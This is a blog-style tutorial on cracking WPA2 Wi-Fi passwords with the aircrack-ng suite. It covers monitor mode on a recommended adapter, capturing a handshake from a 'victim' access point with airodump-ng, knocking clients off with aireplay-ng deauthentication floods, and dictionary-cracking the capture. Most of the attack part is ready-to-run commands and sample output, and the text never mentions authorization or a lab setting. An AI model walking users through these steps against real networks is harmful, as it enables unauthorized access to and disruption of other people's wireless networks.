How to Hack WPA2 WiFi Password with Aircrack-ng

How to Hack WPA2 WiFi Password with Aircrack-ng

Hello geeks how are you? I hope you are doing all the fun stuff learning new things from our one and only teacher Google 😀 so now I will be teaching you How to Hack WPA2 WiFi Password with Aircrack-ng so let’s get into it. So what we need is Kali Linux and it have all the things that you will need for this attack to be a successful here is an article that you can read to know about

Kali Linux: https://securitytraning.com/what-is-kali-linux/ 

 

So let’s begin with the real process to crack the Wi-Fi you need a computer running Kali Linux and with Wi-Fi card that supports monitor mode. And if you are using the internal card of your computer/laptop then you need to get yourself an external Wi-Fi card what is able to perform monitor mode here are some of the recommended chipsets of wi-fi cards that support monitor mode:-

  • 1. Atheros AR9271 – IEEE 802.11B/G/N
  • 2. Ralink RT3070 – IEEE 802.11B/G/N
  • 3. Realtek RTL8187L– IEEE 802.11B/G

Compatible Wi-Fi Adopters:-

  1. Atheros AR9271 chipset
    1. Alfa AWUS036NHA – $28.97
    2. TP-LINK TP-WN722N OR TP-WN722NC $15.99
  2. Ralink RT3070
    1. Alfa AWUS036NH – (Bigger size) $27.99
    2. Alfa AWUS036NEH – (Smaller size) $21.97
  3. Realtek RTL8187L
    1. AWUS036H – (Bigger size) $24.99
    2. AWUS036EW – (Smaller size) $19.97

 

After these things, we will need a wordlist that will be used to crack the password from the captured packets.

Read this to create your wordlist: https://securitytraning.com/creating-custom-dictionary-files-word-list-using-cewl-brute-force/

How Wi-Fi Works?

So let’s get into how wi-fi works that’s important before we get into the hacking part. Wi-Fi transmits signal in the form of packets in the air which are used to connect the computers over the network.

This videos really explains how wi-fi works in an easy way.

How this Works?

We will capture all the packets in the air using airodump. After that, we will see that if anyone is connected to the victim wi-fi network and if no one is connected to that network then this will not work because we need a wpa handshake. We do that by sending deauthentication packets to the user connected to the wi-fi. And when this is done we use Aircrack to crack the password.

Step 0: Installing The Latest Aircrack-ng

Install required dependencies:-

$ sudo apt-get install build-essential libssl-dev libnl-3-dev pkg-config libnl-genl-3-dev

Downloading and installing Aircarck-ng:

$ wget http://download.aircrack-ng.org/aircrack-ng-1.2-rc1.tar.gz -O - | tar -xz
$ cd aircrack-ng-1.2-rc1
$ sudo make
$ sudo make install

Be sure to check that the version of aircrack-ng is up-to-date because you may see problems with older versions.

$ aircrack-ng --help | head -3

Step 1:

Power up your computer and open the terminal, we need to know the name of the wireless adapter connected to the computer it may have many adapters connected to it.

Command for that: iwconfig

as you can see the wi-fi adapter is named as wlan0. It may be different for you.

Step 2: Start the Wireless Interface in Monitor Mode

In this step we will be checking if we can enable monitor mode on the wireless card without any problem because in some cases some process conflicts with it to check that type:

 $ airmon-ng check kill

starting monitor mode on the wireless interface:

$ sudo airmon-ng start wlan0

After that, the monitor mode will be enabled on the wireless interface.

Step 3: Start Airodump-ng to Collect Authentication Handshake

Now come the important part as we have enabled monitor mode on our wireless card now we can see all the wireless traffic which is in the air.

Here is how we do that:-

$ sudo airodump-ng mon0

all of the access points are listed in the upper part of the screen and the clients are listed at the end:

CH 1 ][ Elapsed: 20 s ][ 2014-05-29 12:46

BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

00:11:22:33:44:55  -48      212     1536   66   1  54e  WPA2 CCMP   PSK  CrackMe
66:77:88:99:00:11  -64      134     345   34   1  54e  WPA2 CCMP   PSK  SomeAP

BSSID              STATION            PWR   Rate    Lost    Frames  Probe

00:11:22:33:44:55  AA:BB:CC:DD:EE:FF  -44    0 - 1    114       56
00:11:22:33:44:55  GG:HH:II:JJ:KK:LL  -78    0 - 1      0       1
66:77:88:99:00:11  MM:NN:OO:PP:QQ:RR  -78    2 - 32      0       1

So now we will use airdump-ng on the AP channel that we want to hack with the filter of the BSSID to collect handshake for the access point of the victim.

$ sudo airodump-ng -c 1 --bssid 00:11:22:33:44:55 -w WPAcrack mon0 --ignore-negative-one
Option Description
-c The channel for the wireless network
–bssid The MAC address of the access point
-w The file name prefix for the file which will contain authentication handshake
mon0 The wireless interface
–ignore-negative-one Removes ‘fixed channel : -1’ message

Step 4: Use Aireplay-ng to Deauthenticate the Wireless Client

So this step is an optional one if you wait for the handshake to complete then there will be no need for this step to proceed so in this step we send a message to the user connected to the wi-fi network that he is no longer able to connect to the AP. So naturallty the user will try to reconnect to the AP and we will capture the authenticated handshake.

Send DeAuth to Broadcast:

$ sudo aireplay-ng --deauth 100 -a 00:11:22:33:44:55 mon0 --ignore-negative-one

Send directed DeAuth (attack is more effective when it is targeted) :

$ sudo aireplay-ng --deauth 100 -a [MAC ADDRESS OF AP] -c [MAC ADDRESS OF CLIENT] mon0 --ignore-negative-one
Option Description
–deauth 100 The number of de-authenticate frames you want to send (0 for unlimited)
-a The MAC address of the access point
-c The MAC address of the client
mon0 The wireless interface
–ignore-negative-one Removes ‘fixed channel : -1’ message

Step 5: Run Aircrack-ng to Crack WPA/WPA2-PSK

To crack WPA/WPA2-PSK, you need a password dictionary as input. You can download some dictionaries from here.

Crack the WPA/WPA2-PSK with the following command :

$ aircrack-ng -w wordlist.dic -b 00:11:22:33:44:55 WPAcrack.cap
Option Description
-w The name of the dictionary file
-b The MAC address of the access point
WPAcrack.cap The name of the file that contains the authentication handshake

That was it here are the 2 Videos that you can watch with full explanation and all the steps:-

 

 

 

I hope you like it and will share it with your friends so they can learn new things.